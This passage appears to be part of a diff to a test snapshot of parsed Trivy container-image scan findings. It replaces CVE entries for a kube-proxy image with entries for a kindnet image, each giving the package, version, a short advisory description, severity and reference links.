"http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", - "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", - "http://rump2007.cr.yp.to/15-shumow.pdf", - "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", - "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", - "http://www.securityfocus.com/bid/63657", - "https://access.redhat.com/security/cve/CVE-2007-6755", - "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", - "https://www.cve.org/CVERecord?id=CVE-2007-6755", - "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", ], }, "category": "Vulnerability", - "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "Dual_EC_DRBG: weak pseudo random number generator", + "name": "arbitrary-file-write vulnerability", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-6755", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "http://rump2007.cr.yp.to/15-shumow.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/63657", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2007-6755", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-0928", - "installedVersion": "1.1.1n-0+deb11u1", - "packageName": "libssl1.1", - "references": [ - "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - "http://www.osvdb.org/62808", - "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", - "https://access.redhat.com/security/cve/CVE-2010-0928", - "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", - "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", - "https://www.cve.org/CVERecord?id=CVE-2010-0928", - ], - }, - "category": "Vulnerability", - "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "openssl: RSA authentication weakness", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-0928", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, { "type": "URL", - "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "value": "https://security.gentoo.org/glsa/202209-01", }, { "type": "URL", - "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "http://www.osvdb.org/62808", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, { "type": "URL", - "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, { "type": "URL", - "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3821", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20305", + "installedVersion": "3.4.1-1", + "packageName": "libnettle6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0336", - "https://access.redhat.com/security/cve/CVE-2022-3821", - "https://bugzilla.redhat.com/2139327", - "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", - "https://errata.almalinux.org/9/ALSA-2023-0336.html", - "https://errata.rockylinux.org/RLSA-2023:0336", - "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", - "https://github.com/systemd/systemd/issues/23928", - "https://github.com/systemd/systemd/pull/23933", - "https://linux.oracle.com/cve/CVE-2022-3821.html", - "https://linux.oracle.com/errata/ELSA-2023-0336.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", - "https://security.gentoo.org/glsa/202305-15", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "https://access.redhat.com/security/cve/CVE-2021-20305", + "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "https://linux.oracle.com/cve/CVE-2021-20305.html", + "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "https://security.gentoo.org/glsa/202105-31", + "https://security.netapp.com/advisory/ntap-20211022-0002/", + "https://ubuntu.com/security/notices/USN-4906-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "https://www.debian.org/security/2021/dsa-4933", ], }, "category": "Vulnerability", - "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "buffer overrun in format_timespan() function", + "name": "nettle: Out of bounds memory access in signature verification", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3821", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0336", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3821", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2139327", + "value": "https://avd.aquasec.com/nvd/cve-2021-20305", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "value": "https://access.redhat.com/security/cve/CVE-2021-20305", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0336", + "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/issues/23928", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/pull/23933", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", + "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "value": "https://security.gentoo.org/glsa/202105-31", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202305-15", + "value": "https://ubuntu.com/security/notices/USN-4906-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", + "value": "https://www.debian.org/security/2021/dsa-4933", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "247.3-7+deb11u2", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-4415", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3580", + "installedVersion": "3.4.1-1", + "packageName": "libnettle6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0954", - "https://access.redhat.com/security/cve/CVE-2022-4415", - "https://bugzilla.redhat.com/2149063", - "https://bugzilla.redhat.com/2155515", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", - "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", - "https://errata.almalinux.org/9/ALSA-2023-0954.html", - "https://errata.rockylinux.org/RLSA-2023:0954", - "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "https://access.redhat.com/security/cve/CVE-2021-3580", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://linux.oracle.com/cve/CVE-2021-3580.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "https://security.netapp.com/advisory/ntap-20211104-0006/", + "https://ubuntu.com/security/notices/USN-4990-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3580", ], }, "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://avd.aquasec.com/nvd/cve-2021-3580", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "https://access.redhat.com/security/cve/CVE-2021-3580", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4990-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-14155", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", + "https://access.redhat.com/security/cve/CVE-2020-14155", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2020-14155.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", + "https://security.netapp.com/advisory/ntap-20221028-0010/", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2020-14155", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.pcre.org/original/changelog.txt", ], }, "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "name": "pcre: Integer overflow when parsing callout numeric arguments", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", + "value": "https://avd.aquasec.com/nvd/cve-2020-14155", }, { "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://access.redhat.com/security/cve/CVE-2020-14155", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", - ], - }, - "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://linux.oracle.com/cve/CVE-2020-14155.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://security.netapp.com/advisory/ntap-20221028-0010/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://support.apple.com/kb/HT211931", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-14155", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://www.pcre.org/original/changelog.txt", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "4.16.0-2+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46848", - "installedVersion": "4.16.0-2", - "packageName": "libtasn1-6", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-11164", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0343", - "https://access.redhat.com/security/cve/CVE-2021-46848", - "https://bugs.gentoo.org/866237", - "https://bugzilla.redhat.com/2140058", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", - "https://errata.almalinux.org/9/ALSA-2023-0343.html", - "https://errata.rockylinux.org/RLSA-2023:0343", - 